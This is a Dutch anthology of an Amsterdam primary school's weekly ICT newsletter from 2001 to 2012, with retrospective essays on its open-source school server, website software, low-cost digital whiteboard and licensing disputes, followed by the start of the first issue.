Baarsjes Informatie en Communicatie
Nieuwsbrief 2001-2012

Copyright © 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2015 OBS Rosa Boekdrukker, Amsterdam
Copyright © 2013 Karin Abma, Heemstede
Copyright © 2013 Ronald van der Vliet, Amsterdam
Copyright © 2017 Peter Fokker, Bussum

Creative Commons Licentie BY-NC-ND

Dit werk wordt gepubliceerd onder de voorwaarden in de
Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Dutch License


Openbare Basisschool Rosa Boekdrukker
Vancouverstraat 3 - 5
1056 DT Amsterdam
(020) 612 80 00
http://www.rosaboekdrukker.nl
info@rosaboekdrukker.nl


Amsterdam, zomer 2017


Inhoudsopgave

 1. De BIC als neerslag van de technische en inhoudelijke ontwikkelingen op ICT-gebied in en rond een basisschool 2001-2012 (Ronald van der Vliet)
 2. 12 jaar BIC op de openbare basisschool Rosa Boekdrukker (Karin Abma)
 3. Schooljaar 2001-2002
 4. Schooljaar 2002-2003
 5. Schooljaar 2003-2004
 6. Schooljaar 2004-2005
 7. Schooljaar 2005-2006
 8. Schooljaar 2006-2007
 9. Schooljaar 2007-2008
 10. Schooljaar 2008-2009
 11. Schooljaar 2009-2010
 12. Schooljaar 2010-2011
 13. Schooljaar 2011-2012
 14. 2012 en 2015
 15. Verantwoording (Peter Fokker)
 16. Bijlage: licentietekst Creative Commons BY-NC-ND

De BIC als neerslag van de technische en inhoudelijke ontwikkelingen op ICT-gebied in en rond een basisschool 2001-2012

Samengesteld op basis van de BIC-nieuwsbrieven
door Ronald van der Vliet (oud-directeur Obs Rosa Boekdrukker te Amsterdam)

Amsterdam, februari/maart 2013

2001

In week 40 verschijnt de eerste nieuwsbrief van de Obs Rosa Boekdrukker. Hierin wordt verslag gedaan van de zaken die op ICT-gebied spelen op de school. De nieuwsbrief wordt per e-mail naar belangstellenden verzonden. Later zal deze nieuwsbrief BIC = Baarjes Informatie en Communicatie gaan heten.

Er wordt besloten de school aan te sluiten op het Kennisnet. Dit leidt tot interessante vergelijkingen met de eerste provider UPC. Beide providers hebben zo hun nukken: bv. geen mail doorgeven (UPC) of niet te bereiken (Kennisnet).

Een eerste inventarisatie van software gaat van start door de ingestelde werkgroep ICT. Veel software, vooral niet aan methoden gebonden, is eigenlijk niet geschikt.

Er worden door Karin Abma (ICT-er) afspraken gemaakt met de begeleidingsdienst (ABC) over scholing van leerkrachten en leerlingen.

In een brief worden gemeentelijke instanties verzocht afgeschreven computers beschikbaar te stellen voor het onderwijs. De grafische school wordt gevraagd stagiaires te leveren die een website voor de Obs Rosa Boekdrukker kunnen maken.

Dirk Schouten (ICT-vrijwilliger) installeert een unix firewall en ziet dat het netwerk van de school vele malen wordt aangevallen, maar men komt er niet doorheen.

Karin Abma regelt dat er een mogelijkheid komt voor een computercursus voor ouders in het buurthuis.

Het door Dirk Schouten en John Eversteijn (conciërge) aangelegde netwerk wordt officieel goedgekeurd als UTP Cat5 netwerk.

Naast de computers komen de regels te hangen die door de werkgroep zijn opgesteld. Op een van de gangen komt een rijtje van 6 identieke computers. De harde schijven zijn door Dirk Schouten gekloond.

Aan het eind van het jaar is een voorzichtige conclusie dat het technisch nu wel loopt en er dus meer tijd besteed kan worden aan de inhoud.

Dirk en Karin zijn de gehele levensduur van de nieuwsbrief de redacteuren van de BIC.

2002

Het jaar 2002 begint dus met een goedgekeurd netwerk (draaiend op een samba-server) met daarin een groot aantal 2e-hands computers die de Obs Rosa Boekdrukker kreeg van een gemeentelijke instelling. Deze instelling zal in de loop der jaren nog verschillende keren afgeschreven computers leveren.

De zoektocht naar een op Linux gebaseerde server gaat van start en een eerste router wordt geïnstalleerd. Er is contact met SchoolLan die een speciaal op het onderwijs gerichte server kan leveren. Van de ICT-academie komt een stagiair helpen.

Mark de Haan ontwikkelt in samenwerking met de school een CMS (content management system). In week 35 gaat de website van de Obs Rosa Boekdrukker van start.

Het bestuur (Stadsdeel De Baarsjes) laat haar scholen vrij op het gebied van ICT.

Dirk Schouten krijgt de COS-award “ICT-inspirator” voor zijn vrijwilligerswerk op de Obs Rosa Boekdrukker en zijn onvermoeibare promotie van OSS en GPL.

Een vast onderdeel van alle jaren BIC is het beoordelen van software. De drijvende kracht is hier Karin Abma, ICT-coördinator van de Obs Rosa Boekdrukker. De leerlingen werken met tekstverwerking en paint. Er komt op school een ICT-werkgroep en een eerste poging tot zelfontwikkelde software in de vorm van een dictee-programma gaat van start. De eerste problemen met commerciële software (Letterpret van Malmberg) doen zich voor.

2003

Na verdere contacten met SchoolLan wordt SchoolLan op server gezet. Dit lukt in eerste instantie niet helemaal. Er komen ideeën voor een SchoolLan light.

Het CMS krijgt de volgende naam: Site@School. Het werkt nu ook onder Linux en breekt internationaal door. Er komt zelf een Chinese versie.

Bij Dirk Schouten thuis komt een proefopstelling van een K12 LTSP (Linux Terminal Server).

Als provider wordt voor UPC gekozen en daarnaast wordt een ADSL-provider gezocht. Wegens hoge kosten wordt Kennisnet als provider opgezegd.

Er komt een stagiair van de TU Eindhoven en de Obs Rosa Boekdrukker wordt een gecertificeerd leerbedrijf. Barry Faas demonstreert Edukitty (een framework voor educatieve toepassingen) en Dirk Schouten en Peter Fokker experimenteren met OpenNA.

Letterpret blijft voor problemen zorgen en dat zal voorlopig zo blijven. Een groot succes is het Berenproject waarbij speelgoedberen tussen twee scholen worden uitgewisseld en de leerlingen per mail elkaar van de belevenissen van de beren op de hoogte houden.

Er wordt een begin gemaakt met het automatiseren van de schoolbibliotheek (Educat-B) en de school wordt de pilot voor een nieuw verkeersprogramma “Tussen school en thuis”.

Het beleidsplan wordt door het bestuur goedgekeurd en het ICT-geld overgemaakt aan de school.

De ICT-vorderingen beginnen door te dringen tot de buitenwereld en de school krijgt bezoek van de portefeuillehouder onderwijs van het stadsdeel De Baarsjes en ambtenaren van OC&W.

Er wordt op de Obs Rosa Boekdrukker geworsteld met de organisatie in de klas. Hoe kun je de computer op een nuttige manier gebruiken?

2004

Er komt langzaam lijn in de ontwikkeling van een server geschikt voor het onderwijs. Peter Fokker maakt SchoolLan light en Dirk Schouten heeft thuis een server draaiend gekregen met OpenNA. De eerste stappen worden gezet op weg naar een samenwerkingsverband voor zo'n OSS/GPL server.

Site@School wordt maar het liefst 6000 keer gedownload en er komt een module voor nieuwsbrieven.

KPN biedt gratis internet aan voor scholen. De Obs Rosa Boekdrukker gaat daarop in naast de verbinding van UPC.

Vier scholen besluiten om gezamenlijk elk 5000 euro in te leggen om Server op School te starten. Dit zijn Obs Rosa Boekdrukker, de Joop Westerweel, de Sterrenwachter en de Corantijn. Aan het eind van het jaar draait S#S (=Server op School) op de vier scholen en is de eerste cyberaanval op het systeem met succes afgeslagen.

In het nieuwe schooljaar komt de positie van Obs Rosa Boekdrukker als innoverende school op ICT-gebied in gevaar, omdat de tijd beschikbaar voor ICT-coördinatie teruggeschroefd wordt.

Aan de server wordt Sabrine (Semi Automatic Backup and Restore In a Network Enviroment) toegevoegd, waardoor een snel terugzetten van een image op werkstations mogelijk wordt.

Elke BIC heeft wel nieuws voor de leerkrachten over software en over voor het onderwijs belangrijke sites. Zolang de BIC uitgegeven wordt, blijft dit een belangrijk onderdeel.

Site@School wordt voorzien van de mogelijkheid tot publicatie van eigen leerlingpagina's.

De problemen met Letterpret blijven aanhouden. Er is overleg over de problemen tussen de directeur van de Obs Rosa Boekdrukker en Malmberg. In week 39 werkt Letterpret eindelijk.

Het hele jaar wordt aandacht besteed aan de ICT-leerlijn. Groot probleem blijven de leerkracht-vaardigheden. Er is aandacht voor veilig werken op het internet.

Alle bibliotheekboeken van de Obs Rosa Boekdrukker zijn ingevoerd in Educat-B

2005

Er wordt bekeken of OpenOffice een geschikt programma is voor het basisonderwijs. De gemeente Haarlem is een klankbord, want daar is men al eerder afgestapt van Word.

De eerste ideeën rond een gebruikersvereniging voor S#S gebruikers worden geopperd. Een aantal scholen van de Stichting Katholiek Basisonderwijs Amsterdam sluiten zich aan bij S#S.

Op de Obs Rosa Boekdrukker wordt een demonstratie gegeven van S#S voor verschillende belangstellenden waaronder het hoofd onderwijs van De Baarsjes, stichting “ICT op school” en het Linux-magazine. De naam Server op School wordt Server at School. Het beeldmerk blijft hetzelfde: S#S. De naam STRICT (=Scholen Tezamen Rijk door ICT) wordt bedacht voor een op te richten gebruikersvereniging.

Leerkrachten kunnen thuis aan documenten werken via het programmaatje WinSCP (= Open source graphical SFTP client for Windows).

Ook in Friesland (Franeker) gaat een school over op S#S. Het backupsysteem van S#S werkt. Drie Amsterdamse scholen bewaren elkaars versleutelde back-ups.

De eerste aanzet voor het verzet tegen de combinatie APS/Microsoft duikt op. De licenties van Windows voor het onderwijs zijn alleen via het APS (duur) te verkrijgen. Er worden voor de Obs Rosa Boekdrukker licenties buiten het APS om gekocht.

De gemeente Haarlem stelt tegen een redelijke prijs handleidingen voor OpenOffice beschikbaar.

S#S is er nu ook in het Bulgaars.

Met S@S is nu het mogelijk een afgeschermd deel voor de leerkrachten te maken. De wekelijkse nieuwsbrief voor de leerkrachten wordt dan ook op de Obs Rosa Boekdrukker via de website gepubliceerd. Er komt een TV-module in S@S.

Letterpret geeft toch weer problemen en de Obs Rosa Boekdrukker besluit met dit programma te stoppen.

Als naschoolse activiteit verzorgt Technika 10 een computercursus voor meisjes.

Het hele jaar door wordt er gewerkt aan een leerlijn ICT. De nadruk blijft ook dit jaar liggen bij de leerkracht-vaardigheden.

2006

Op de Obs Rosa Boekdrukker worden na een rondje offertes bekijken 70 nieuwe computers (werkstations) aangeschaft.

Dirk Schouten heeft contact met het blindeninstituut om S@S geschikt te maken voor blinden en slechtzienden.

OpenOffice wordt op alle werkstations geïnstalleerd. Een computer bij de administratie blijft Word gebruiken om sommige formulieren, die aangeleverd worden door instanties buiten de school, te kunnen lezen en gebruiken.

De Obs Rosa Boekdrukker gebruikt het programma “Met Woorden in de Weer” van Marianne Verhallen ter vergroting van de woordenschat en er wordt geopperd om te onderzoeken in hoeverre ICT hierbij een rol kan spelen. Er wordt een oproep gedaan aan alle scholen die werken met MWidW om mee te denken.

Zoals gebruikelijk komen ook dit jaar weer verschillende mensen op bezoek, soms ook uit het buitenland: bv. België en Japan.

Het plaatsen van een nieuwe image op de werkstations gaat steeds makkelijker. Een kwestie van op een toets drukken en binnen 10 minuten staat er een nieuwe image.

De Obs Rosa Boekdrukker gaat over naar XS4all van de KPN dat gratis aan scholen aangeboden wordt. Het abonnement bij UPC wordt opgezegd.

Bij een evaluatie halverwege het jaar blijkt dat de meeste doelstellingen van ICT voor leerlingen en leerkrachten bereikt zijn. De ICT-coördinator kan zich meer en meer richten op coaching. Er wordt besloten volgend schooljaar meer aandacht te besteden aan veilig internetten.

Er wordt een begin gemaakt met de integratie van XP in S#S.

In week 40 wordt door Dirk Schouten, Peter Fokker en Ronald van der Vliet bij een notaris in Utrecht de gebruikersvereniging STRICT opgericht.

Het uitlenen van boeken geschiedt op de Obs Rosa Boekdrukker nu geheel digitaal. Er is aan het eind van het jaar nog een bijeenkomst van scholen die met MWidW werken. De knelpunten worden geïnventariseerd.

Gerard Prenger, de nieuwe directeur van de Obs Rosa Boekdrukker en Karin Abma bezochten de "aftrap" van het project “Klassenmanagement met ICT”. Er was een school uit Groningen, die liet zien hoe hun onderwijs is ingericht, en dat ze heel veel gebruik maken van allerlei functionaliteiten van hun website. Ze gebruiken dus S@S!!

2007

Het jaar begint met een vergadering van MWidW. Er is een werkgroepje opgericht om uit te werken hoe je via het web het 'invulschema semantiseren' kunt vormgeven. Er wordt besloten een mailinglijst te maken om effectief met elkaar te communiceren.

In week 3 vindt de eerste Algemene Ledenvergadering van STRICT plaats. S#S werkt nu ook met XP op werkstations. Er is voor het eerst sprake van het digitale schoolbord.

Fred heeft het Site@School-team verlaten wegens een verschil van opvatting over de te volgen koers bij het verbeteren van de Site@School-software. Vooral de veiligheid is een hot item. De code moet volledig herschreven worden. Er wordt gezocht naar geld (o.a. In Europa) om dit te bekostigen. Het zal nog tot 2011 duren voor een geheel nieuwe en veilige versie van S@S uitkomt.

Karin Abma en Dirk Schouten gaan deelnemen aan een workshop "Aan de slag met Open Source". De workshop is bedoeld om deelnemers voor te bereiden op het geven van voorlichting over OSS voor overheid, onderwijs, MKB, Zorg en ICT. Ze zijn daartoe uitgenodigd omdat ze in het onderwijs zitten en OSS aldaar propageren en gebruiken.
BOA (=Breedbandnetwerk Onderwijs Amsterdam) gaat van start. De bedoeling is aansluiting van alle scholen op een glasvezelnetwerk. Het is erg duur.

Er komt een nieuwe feature in S#S waardoor het mogelijk wordt op afstand nieuwe images op werkstations te zetten. In België worden licenties voor XP aangeschaft.

Bij de start van het nieuwe bestuur van de Obs Rosa Boekdrukker wordt aan de scholen gevraagd waar ze trots op zijn en hierover een presentatie te geven. Dat is voor de Obs Rosa Boekdrukker niet moeilijk te beantwoorden: S@S en S#S.

In de BIC's van week 43 en 44 wordt uitgebreid verteld wat OSS en GPL nu eigenlijk betekenen. Het verzet tegen BOA neemt toe. Er schijnt een contract te zijn van het bestuur met BOA waarvan de scholen niets weten. Op een voorlichting wordt gezegd dat als men later een aansluiting wil, dat 10.000 euro gaat kosten. Behalve met de techniek gaat BOA zich ook bemoeien met de onderwijsinhoud.

Het gaat ondertussen steeds beter met het inzetten van de computer in de klas op de Obs Rosa Boekdrukker. Dit is ook te danken aan steeds betere software. De directeur van het schoolbestuur AWBR(=Amsterdam-West Binnen de Ring) en studenten van de Educatieve Faculteit Amsterdam komen op bezoek.

2008

Er is nog steeds veel onduidelijkheid m.b.t. BOA. Karin Abma gaat een opleiding tot mediacoach volgen.

Er wordt een klacht tegen Microsoft/APS voorbereid, die naar de NMa moet. Het probleem zijn de exclusieve rechten, die APS geniet en die scholen dwingt licenties bij hen te huren. Er is ook contact hierover met het ministerie van economische zaken. Uiteindelijk wordt er ook een klacht ingediend in Brussel bij Neelie Smit-Kroes. Een gevolg van deze acties is dat men nu bij APS ook licenties kan kopen i.p.v. huren.

Er zijn experimenten met “Expert in de klas” waarbij een verbinding wordt gelegd tussen (in dit geval) Naturalis in Leiden en een groep op de Obs Rosa Boekdrukker. In eerste instantie mislukt het, maar in week 15 gaat het uitstekend en blijkt de internetverbinding van de Obs Rosa Boekdrukker prima te werken.

Het geruzie over BOA blijft voortduren. 2 scholen weigeren een aansluiting op het glasvezelnet.

Op de Obs Rosa Boekdrukker gaat men op zoek naar digitale schoolborden. Er worden eisen opgesteld waaraan een goed digibord moet voldoen. Belangrijke eisen zijn natuurlijk open en platformonafhankelijke soft- en hardware.

Karin Abma is geslaagd voor haar examen “mediacoach”. De onderwijsraad komt op bezoek. Zij doen in opdracht van de 2e Kamer onderzoek naar ICT in het onderwijs. In de zomervakantie gaat de Obs Rosa Boekdrukker over naar XP en het eerste zelfontwikkelde digibord wordt geïnstalleerd in een groep 3. Als je de beamer niet meerekent kost het digibord € 99,95. Een bedrijfje kan het digibord (zonder beamer) voor € 159 leveren. Er is op het internet veel belangstelling voor “Ons Bord”.

AWBR zet een werkgroep ICT op.

2009

Karin Abma en Dirk Schouten gaan in opdracht van de werkgroep ICT gesprekken voeren met de 17 scholen van AWBR. Wanneer Karin en Dirk hun verslag presenteren in de werkgroep is de belangstelling helaas gering. De presentatie wordt ook gedaan voor de schooldirecteuren. Later in het jaar wordt het verslag aangeboden aan de directie van AWBR.

In de ouderkamer komt op de Obs Rosa Boekdrukker een kenniscentrum met 15 computers.

Cito zorgt voor problemen met de digitaal af te nemen niveautoets. Op de dag van de afname is de server overbelast.

Op de Joop Westerweel en de Corantijn wil men ook digiborden van OnsBord. Enkele lezers denken dat Karin en Dirk het interactief whiteboard zelf maken en verkopen . Dat is niet zo. Niels Kooy (professioneel elektronicus) maakt ze en verkoopt ze. Wel zijn zij natuurlijk voortdurend bezig met het nadenken over het gebruik (software).

Een van de adviseurs voor het project Open.Amsterdam van de Concern Organisatie Afdeling Informatiebeleid, van de bestuursdienst (gemeente Amsterdam), komt op bezoek.

Het aansluiten van de glasvezelkabels gaat niet erg goed. Als het eindelijk voor elkaar is, blijkt het langzamer dan de verbinding via XS4all. Helaas moet KPN in 2010 stoppen met het gratis aanbieden van deze verbinding.

Karin Abma en Dirk Schouten worden gevraagd mee te denken met het Wikiwijs-initiatief van minister Plasterk. Een delegatie van een schoolbestuur uit Purmerend komt op bezoek.

Vanuit de werkgroep krijgen Karin en Dirk opdracht om een beleidsplan ICT te schrijven. Ook zijn zij geselecteerd door Kennisnet om een project te doen. Met ruim € 16.000 subsidie gaan ze experimenteel onderzoek doen naar nieuwe vormen van samenwerkend leren en de mogelijkheden die het digitaal interactief whiteboard daarbij zou kunnen bieden. Dit gaan ze in augustus 2010 doen.

2010

De 2e Kamerfractie van de SP bezoekt de Obs Rosa Boekdrukker. Zij blijken zeer goed geïnformeerd. De naschoolse activiteit Fotografie gaat op verzoek van BIC werken met Gimp, een gratis en OSS fotografie-programma.

Het langlopende probleem met een UPS is uiteindelijk opgelost. Er komt nu ook een log-bericht als de accu's zwakker worden.

De certificering van OnsBord is bijna klaar. De laptops van de Joop Westerweel worden elke nacht (automatisch) voorzien van een nieuw image.

Leerlingen van de Obs Rosa Boekdrukker gaan games testen voor ZAPP. De bestuursdienst van de gemeente Amsterdam komt op bezoek.

De kosten van één digitaalbord van OnsBord worden inclusief beamer en plaatsen geschat op 2000 euro. Er komen bestellingen voor OnsBord uit België en de 2e Kamer bestelt er twee.

Het bedrijf CompuStunt mag van Microsoft geen, goedkope, licenties leveren aan V.O.-scholen. Hetzelfde probleem als bij het basisonderwijs.

Bovenschoolse ICT-ers in Amsterdam waarschuwen hun besturen BOA alleen te laten zorgen voor de techniek en niet ook voor allerlei onderwijsinhoudelijke toepassingen. De glasvezelaansluiting werkt en wordt gebruikt voor het 's nachts maken van back-ups. Dit gaat razend snel.

Het begin van het einde: Karin Abma en Dirk Schouten worden “tijdelijk” uit de ICT-werkgroep van AWBR gezet. Dirk stapt er definitief uit.

XS4all dat de Obs Rosa Boekdrukker aangehouden heeft, is niet meer gratis maar gaat € 15 per maand kosten.

De toon van de BIC wordt somber: “Verder innovatie lijkt niet meer mogelijk”. Goed nieuws is er ook. Voor OnsBord komen bestellingen uit de VS, België en Maleisië. Er wordt gewerkt aan een computercursus voor ouders en in week 45 is er alweer de 2e jaar-vergadering van STRICT.

Peter Fokker vindt een oplossing voor het bekijken van de formulieren van de begeleidingsdienst. Dit kon alleen met Adobe-reader, maar nu ook met een “gewoon pdf-dingetje”.

2011

De geheel vernieuwde versie van S@S is uit en gaat verder onder de naam “Website@School”. Dirk Schouten heeft een nieuwe handleiding geschreven. Het is ook geschikt voor blinden en slechtzienden. Er komen weer vele vertalingen o.a. een Chinese vertaling en een vertaling in Esperanto.

Het bestuur (AWBR) van de Obs Rosa Boekdrukker is definitief in zee gegaan met Heutink voor ICT op haar scholen. Naar aanleiding van o.a. deze gebeurtenis doet de BIC er af en toe het zwijgen toe.

De BIC-redactie bezocht de IPON 2011 en noteerde het volgende:

“Op donderdag legde keynotespeaker Möckelmann de vinger op de zere plek: "Waar heb je al die spullen voor nodig? Formuleer eerst je leerdoelen, en kijk dan waar je ICT bij kunt inzetten." Dus niet: gooi je school vol met fantastische spullen en dan komt alles vanzelf. Nee, zo werkt het niet. Het klonk ons bekend in de oren. We schrijven er al jaren over.”

Website@School krijgt een subsidie van het Europees Platform voor het bevorderen van internationale samenwerking tussen leerlingen.

In de BIC verschijnt in week 43 kritiek op Microsofts Silverlight. “Er is niet veel veranderd sinds 2002”, aldus de BIC-redactie.

Bij de start van de 11e jaargang wordt het duidelijk dat de BIC onder het nieuwe schoolbestuur in moeilijk vaarwater terecht is gekomen. Zie het volgende citaat:

Maar de goede redenen als antwoord op de vraag "Waarom is de Rosa Boekdrukker op ICT gebied innoverend?" is niet meer naar waarheid, juistheid en waarachtigheid te beantwoorden. Google voor uitleg op "Jürgen Habermas" en bovengenoemde begrippen.

We beraden ons op wat we met de BIC doen.

Op de algemene ledenvergadering van STRICT blijken er 2 scholen bijgekomen te zijn, maar helaas hebben de AWBR-scholen hun lidmaatschap moeten opzeggen.

Het bestuur van de AWBR vraagt aan de GMR waar op bezuinigd kan worden. De BIC-redactie heeft het antwoord: op ICT.

2012

Nog een paar keer verschijnt de BIC in 2012. Een aantal oude bekende zaken komen voorbij: de voortdurende strijd tegen Microsoft, de bloei van Website@School en OnsBord, de puinhoop van de Cito-eindtoets online, enz.

Hoogtepunt van het jaar is de Koninklijke erkenning van het werk op de Obs Rosa Boekdrukker, wanneer Dirk Schouten benoemd wordt tot Lid in de Orde van Oranje Nassau.

Aan het eind van het jaar verschijnt de laatste BIC waarvan hieronder de volledige inhoud:

Beste BIC-lezers,
De twaalfde jaargang van onze wekelijkse ICT nieuwsbrief, de BIC is aangebroken. Echter, sinds week 18 is er geen BIC meer verschenen.

Dat komt doordat ons schoolbestuur (AWBR) onze ICT projecten niet langer ondersteunt.
Dit houdt in, dat ons netwerkbeheersysteem,
serveropschool, ophoudt op de Rosa Boekdrukker. Ook het goedkope, multifunctionele digitale schoolbord, Ons Bord, is niet meer bij ons op school. Wat bij ons nog rest is onze website, die nog zal overgaan naar websiteatschool.
Ook het lidmaatschap van
STRICT (Scholen Tezamen Rijk met ICT) wordt beëindigd.

U zult wel begrijpen, dat we het heel moeilijk hebben om ons werk van vele jaren vaarwel te zeggen.

Dirk en ik zijn u allen zeer dankbaar voor de vele suggesties, aanbevelingen, feedbacks, kritiek en leuke opmerkingen, waardoor wij de BIC meer dan 11 jaar hebben kunnen maken en die mede hebben bijgedragen aan de ICt ontwikkelingen die wij deden voor de wereld, zoals Dirk dat altijd zo mooi kan zeggen.

Groet en goed weekend,
Karin,
Dirk

12 jaar BIC op de openbare basisschool Rosa Boekdrukker

BIC: Baarsjes Informatie en Communicatie, wekelijkse ICt nieuwsbrief

Het verhaal over het ontstaan ervan.
door Karin Abma (oud-leerkracht en -ICT-coördinator Obs Rosa Boekdrukker te Amsterdam)

Heemstede, voorjaar 2013

Obs Rosa Boekdrukker, basisschool in Amsterdam, stadsdeel 'de Baarsjes'

Op de Rosa Boekdrukker hebben we vanaf 1996 gewerkt aan het tot stand brengen van een ICt ([1] zie noot aan 't einde artikel) netwerk, een websitebeheersysteem en een ICt leerlijn.

We gingen niet met de laatste mode mee en waren zuinig met de ons toebedeelde financiële middelen. Dat begon al bij de aanleg van ons netwerk in 2000: We deden het zelf. Het spaarde veel geld en we leerden er veel van. We wilden een website voor de school, vonden niet wat we zochten en ontwierpen ons eigen website beheersysteem.
Toen we voor de keuze van een serversysteem stonden, vonden we niet precies wat een basisschool nodig heeft, dus ontwikkelden we zelf zo'n systeem. Het werd ServerAtSchool. Op dezelfde manier begonnen we aan de 'ICt leerlijn' en 'Met Woorden in de Weer' en het 'Digitaal whiteboard voor € 99,-' Deze projecten zijn in ontwikkeling. Ze zijn een afspiegeling van ons ICt beleid.

Wat vooraf ging

Ons stadsdeel probeerde in 1997 de scholen in de Baarsjes op ICT gebied op één lijn te krijgen. Ze huurden een adviesbureau in om een plan op te stellen. Wij op de Rosa Boekdrukker waren op ICt gebied veel verder dan de andere scholen. Naar ons gevoel werden we door dat advies bureau uitgehoord om ideeën aan te leveren. We wisten het stadsdeel ervan te overtuigen dat de plannen van het adviesbureau weinig voorstelden. We wilden de scholen in de Baarsjes zelf informeren over onze ideeën en ontwikkelingen en vondsten op ICt gebied. Zo ontstond de BIC, een wekelijke ICt nieuwsbrief.

Leidraad voor alles en dus ook voor de BIC:

Dus:

De ICt kennis die we dagelijks opdeden deelden we in de BIC en in ander informatiemateriaal dat altijd online te vinden is onder een Creative Commons licentie.
We werken al jaren met Open Source Software (OSS) en gebruiken Open Standaarden (OS); beide waar dat maar mogelijk is. Dat spaart veel geld en we hadden in dit opzicht een voorhoedepositie in het basisonderwijs.
Onze school is waarschijnlijk de enige basisschool in Nederland die zelf hard- en software ontwikkelde. Alles wat we hebben gemaakt stellen we kosteloos ter beschikking aan de wereld omdat we met gemeenschapsgeld gefinancierd worden; “U heeft al betaald” was ons motto. Onze software wordt wereldwijd gebruikt en is in vele talen beschikbaar.

Groei van de BIC

Door al onze contacten (kennis delen) kwamen er steeds meer abonnees op de BIC. De BIC ging zelfs de grens over naar België. De nieuwsbrief was niet langer alleen voor de scholen in de Baarsjes, maar voor alle scholen die maar iets van ons wilden horen.

Men vond ons onder andere door zoektermen op het internet. We kregen vragen en ook suggesties. Het aantal abonnees groeide, onze ideeën werden besproken èn onze ideeën werden gevoed.

Van e-mail naar web

De eerste jaren werd de BIC via e-mail verzonden. Tijdens de ontwikkeling van ons website beheersysteem Site@School maakten we een speciale nieuwsbrieven module voor de BIC en andere nieuwsbrieven voor ouders en voor projecten.

Melding in de BIC van 23 april 2004:

- Onbeperkt aantal nieuwsbrieven mogelijk. Dus groep 8 kan een eigen nieuwsbrief hebben en die zelf beheren, maar ook de MR, de ouders, de teamnieuwsbrief, de ...

- Een nieuwsbrief kan door meerdere redacteuren beheerd worden (samenwerken! )

- Aan- en afmelden mogelijk via de website. Uitgebreid instelbare email-alerts aan de redacteur. Je hebt vrijwel geen omkijken naar het systeem.

- Abonnees kunnen wel/niet bijdragen insturen naar de redacteur van een nieuwsbrief.

- Je kunt nieuwsbrieven per e-mail en/of op je website publiceren.

- Een archief voor oude nieuwsbrieven.

Onderwerpen in de BIC

We schreven de BIC gedurende de week met zijn tweeën. Dirk deed de technische en ideologische (OS en OSS en Freinet) stukken en Karin de onderwijsinhoudelijke: welke programma's zijn bruikbaar, hoe maak je een ICt leerlijn, wat doen de kinderen er nu werkelijk mee, hoe worstelen we met het inpassen van computers in de lessen, tegen welke problemen lopen we aan, wat zijn leuke sites, etc.

Op al die onderwerpen kregen we elke week wel commentaar en aanvullingen uit Nederland of België.

Inspiratie

De feedback zorgde voor inspiratie om te schrijven en om verder te ontwikkelen. We gingen naar lezingen, beurzen, Ict en ICT bijeenkomsten. Er kwamen mensen overal vandaan bij ons op school kijken en praten. We werden aan alle kanten gevoed. Onze school kwam op ICt gebied op de kaart te staan. Overal waar we kwamen hoorden we: “O, zijn jullie van de Rosa Boekdrukker?” Onze wekelijkse nieuwtjes en ervaringen zorgden voor een soort olie-vlek-werking met weer nieuwe ideeën.

Ritme

Voor Dirk en Karin zat het schrijven van de BIC in een wekelijks ritme. Door de week het verzamelen van onderwerpen. Op vrijdagmiddag na schooltijd werd het tot een geheel geschreven. De deadline van 16.00 uur was het streven.

Open Standaarden en Open Source Software

Onze motto's lagen aan alles ten grondslag:

Vertel waar je mee bezig bent, en wees zuinig met gemeenschapsgelden.

We hebben, hierdoor geleid, enorm veel geld bespaard. Goedkope licenties, tweedehandscomputers, werken met Linux, alleen dat gebruiken wat een school nodig heeft, opensource programma's (Open Office) gebruiken. Dat uitgespaarde geld hebben we jaren gebruikt om de leerkrachten bij te scholen op ICt gebied.

Invloed/uitwerking op andere scholen

Heel veel scholen waren geïnteresseerd in onze uitvindingen. Die wilden ook wel besparen en maakten gebruik van onze opgedane kennis.

Voortschrijden der jaren.

De invloed van grote schoolbesturen heeft roet in het eten gegooid. Bestuurders besteden ICT aangelegenheden uit aan instanties die niet werken in het onderwijs en andere belangen hebben. Onze doelstellingen:

passen daar niet in.

Met het gevolg, dat het ontwikkelen van ICt op de Rosa Boekdrukker niet meer plaatsvindt en daardoor de BIC na 12 jaar gestopt is.

Plezier

De BIC is met heel veel plezier, enthousiasme en inzet gemaakt.

We zijn er zo trots op, dat we alle afleveringen hebben gebundeld en zullen aanbieden aan de Koninklijk Bibliotheek. Het is een geschiedenisboek over hoe ICt in ons onderwijs mogelijk is.

Noten

[1] ICt: We bewegen ons op het snijvlak van onderwijs en Informatie, Communicatie en techniek. De I en de C zijn een al te gemakkelijke prooi voor de T die onevenredig grote en vooral commerciële belangen dient. Het onderwijs weet weinig van ICt. Kritisch volgen van ICt in het onderwijs is één van onze taken. Vandaar die 't'.

Schooljaar 2001-2002

 1. 2001-10-05 w40
 2. 2001-10-12 w41
 3. 2001-10-19 w42
 4. 2001-11-02 w44
 5. 2001-11-09 w45
 6. 2001-11-16 w46
 7. 2001-11-23 w47
 8. 2001-11-30 w48
 9. 2001-12-07 w49
 10. 2001-12-14 w50
 11. 2001-12-21 w51
 12. 2002-01-11 w02
 13. 2002-01-18 w03
 14. 2002-01-25 w04
 15. 2002-02-01 w05
 16. 2002-02-08 w06
 17. 2002-02-15 w07
 18. 2002-03-01 w09
 19. 2002-03-08 w10
 20. 2002-03-15 w11
 21. 2002-03-22 w12
 22. 2002-03-29 w13
 23. 2002-04-05 w14
 24. 2002-04-12 w15
 25. 2002-04-19 w16
 26. 2002-04-26 w17
 27. 2002-05-24 w21
 28. 2002-05-31 w22
 29. 2002-06-07 w23
 30. 2002-06-14 w24
 31. 2002-06-21 w25
 32. 2002-06-28 w26

2001-10-05 w40

+++++++++++++++++++++++++++++++++++++++++++++++++
1e Nieuwsbrief Rosa Boekdrukker week 40 - 2001
+++++++++++++++++++++++++++++++++++++++++++++++++


Dag Allemaal,

Dit is onze laatste uitvinding. Alles wat aan dit e-mailadres wordt gezonden wordt automatisch naar iedereen (zie lijst die in aparte mail zit) gestuurd. In onze moderne communicatie omgeving is het elkaar op de hoogte houden middels e-mails bij velen vanzelfsprekend geworden. Als we dus samen voortgang willen maken, zullen we elkaar moeten e-mailen. Zo kunnen we op de hoogte blijven van wat er in de verschillende scholen gebeurt op technologiegebied.
Het is ook geschikt voor vragen en opmerkingen en leuke tips.

Op de Rosa Boekdrukker zijn de volgende zaken de afgelopen maand aan de orde geweest:

 1. alle lokalen met hun computers zijn aangesloten op het netwerk
